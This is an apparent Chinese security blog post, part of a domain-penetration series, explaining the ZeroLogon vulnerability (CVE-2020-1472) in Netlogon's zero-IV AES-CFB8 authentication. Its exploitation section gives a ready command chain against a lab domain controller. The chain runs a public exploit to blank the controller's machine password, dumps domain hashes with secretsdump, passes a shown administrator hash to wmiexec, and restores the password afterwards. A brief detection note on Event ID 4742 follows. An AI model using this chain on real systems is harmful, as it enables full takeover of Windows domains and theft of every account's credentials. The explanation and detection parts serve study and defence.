域渗透系列--那些一键打域控的漏洞之ZeroLogon

0x01 漏洞描述

Zerologon,编号为CVE-2020-1472,是 Netlogon 远程协议 (MS-NRPC) 中的一个身份验证绕过漏洞。Netlogon 是一个远程过程调用 (RPC) 接口,Windows 使用它来对基于域的网络上的用户和计算机进行身份验证,例如维护域成员与域控制器 (DC) 之间的关系,跨一个或多个域的多域控制器之间的关系以及复制域控制器数据库。Netlogon 的功能之一是允许计算机对域控制器进行身份验证并更新它们在 Active Directory 中的密码,由于这个特殊功能导致Zerologon 漏洞,该漏洞允许攻击者冒充任何计算机到域控制器并更改其密码,包括域控制器本身的密码。导致攻击者获得管理访问权限并完全控制域控制器,从而完全控制网络。

0x02 漏洞原理

NetLogon通信过程


客户端向NetLogon服务器(如windows域控)发送八个随机字节(ClientChallenge,简称CC),服务端用自己的八个随机字节(ServerChallenge,简称SC)作为回复,双方将两个随机字符串和一个共享秘钥合在一起,生成一个一次性的加密密钥,称为 SessionKey(SK)。在客户端中存储在注册表上,在域控制器上存储在Active Directory。 SessionKey是被HMAC-SHA256通过摘要算法生成的,伪代码如下:

hstring = CC  ..   SC    //合并Challenge生成的16位字节码
secret = GetSecretPassword()
hkey = MD4(secret)
hashval = HMAC_SHA256(hkey, hstring) 
SessionKey = substr(hashval, 1, 16)

这种会话密钥设置避免在加密 Netlogon 流量时直接使用secret key,并确保每个会话都有唯一的密钥,双方都将自己的随机字节注入其中,服务器可以通过接受加密的函数调用来假设客户端知道真实的密码,如果客户端使用伪造的密码,请求将无法正确解密导致失败。

NetLogon中的AES-128-CFB8加密


CFB8每次只使用密钥的第一个字节并将其与一个明文字节进行异或。然后砍掉刚刚使用的密钥流字节,并在密钥流的末尾添加新的密文字节,通过一个完整的数据块来加密以生成下一个密钥流字节


如果客户端和服务器之间协商了 AES 算法,Netlogon 凭据是使用 AES-128 加密计算的,具有零初始化向量的 8 位 CFB 模式下的算法如下:

ComputeNetlogonCredential(input,SessionKey,output)      
          SET IV = 0      
          CALL AesEncrypt(input、SessionKey、IV、output)

CFB8 模式下的全零 IV 存在安全性问题,因为 AES 是一种没有统计偏差的高质量密码,输入任何使用密钥加密的字符,输出中的每个位为0或1的概率都为 50%,所以8 个输出位全为零的几率为1/2的八次方,即1/256。 所以也就意味着有1/256的概率输出可以锁定为全0的状态。通过提交一个全0的ClientChallenge,然后再提交一个全0的Netlogon凭据计算,即使不知道sessionkey也可以在1/256的时间内得到正确的计算结果,因为始终是在对0进行加密。

0x03 漏洞利用

利用脚本下载,需要安装impacket模块 https://github.com/dirkjanm/CVE-2020-1472

python3 cve-2020-1472-exploit.py WIN-MKURK02ECFG 172.20.10.12


执行成功之后会把域控机器账号密码置空,重置成功后的hash为 31d6cfe0d16ae931b73c59d7e0c089c0,再利用impacket secretsdump脚本读取域控的hash。

python3 secretsdump.py test.com/'WIN-MKURK02ECFG$'@172.20.10.12 -no-pass -output test.com.ntds.hash


拿到administrator的hash进行pth横向移动到域控,也可以通过krbtgt aes256制作黄金票据。

python3 wmiexec.py test.com/administrator@172.20.10.12 -hashes :579da618cfbfa85247acf1f800a280a4


利用完成后需要还原账户的密码,如果不这样做的话会导致机器脱域的问题,还可能由于设置了域同步复制导致业务不可用等问题,后果比较严重。
查询administrator 16进制明文密码

python3 secretsdump.py -hashes :579da618cfbfa85247acf1f800a280a4 test.com/administrator@172.20.10.12


利用restorepassword脚本还原域控机器账号密码

python3 restorepassword.py WIN-MKURK02ECFG@WIN-MKURK02ECFG -target-ip 172.20.10.12 -hexpass XXXXXXX


也可以利用mimikatz一步到位:
zerologon检测


zerologon利用


提取administrator账号hash


还原密码

0x04 攻击检测

zerologon攻击利用后会产生EVENT ID 4742日志,通过“ANONYMOUS LOGON”对应的目标账号如果是机器账号则很大程度上判断机器遭到了攻击且攻击已经成功发生。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,076评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,658评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,732评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,493评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,591评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,598评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,601评论 3 415
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,348评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,797评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,114评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,278评论 1 344
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,953评论 5 339
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,585评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,202评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,442评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,180评论 2 367
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,139评论 2 352

推荐阅读更多精彩内容